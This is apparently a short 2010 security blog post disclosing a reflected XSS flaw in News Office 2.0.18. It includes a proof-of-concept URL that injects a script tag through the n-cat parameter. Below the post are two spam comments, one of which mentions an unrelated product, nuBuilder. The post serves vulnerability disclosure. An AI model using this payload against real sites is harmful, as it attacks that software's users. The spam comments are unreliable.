This site is soon to be deprecated by http://www.johnleitch.net

Monday, July 5, 2010

News Office 2.0.18 Reflected XSS

An XSS vulnerability in News Office 2.0.18 can be exploited to
execute arbitrary JavaScript.

PoC
http://localhost/newsoffice/news_show.php?n-user=a&n-cat='%3E%3Cscript%3Ealert(0)%3C/script%3E
Posted by John Leitch at 9:36 AM
Labels: , ,

2 comments:

  1. MCAFebruary 1, 2012 at 2:32 AM

    installazione pannelli fotovoltaici romaanger triggers

    ReplyDelete
  2. leeeFebruary 4, 2012 at 12:36 PM

    Thank you for finding this vulnerability. It has since been fixed and an updated version of nuBuilder is now available on our website Boots UKIs phen375 Safe?

    ReplyDelete

Subscribe to: Post Comments (Atom)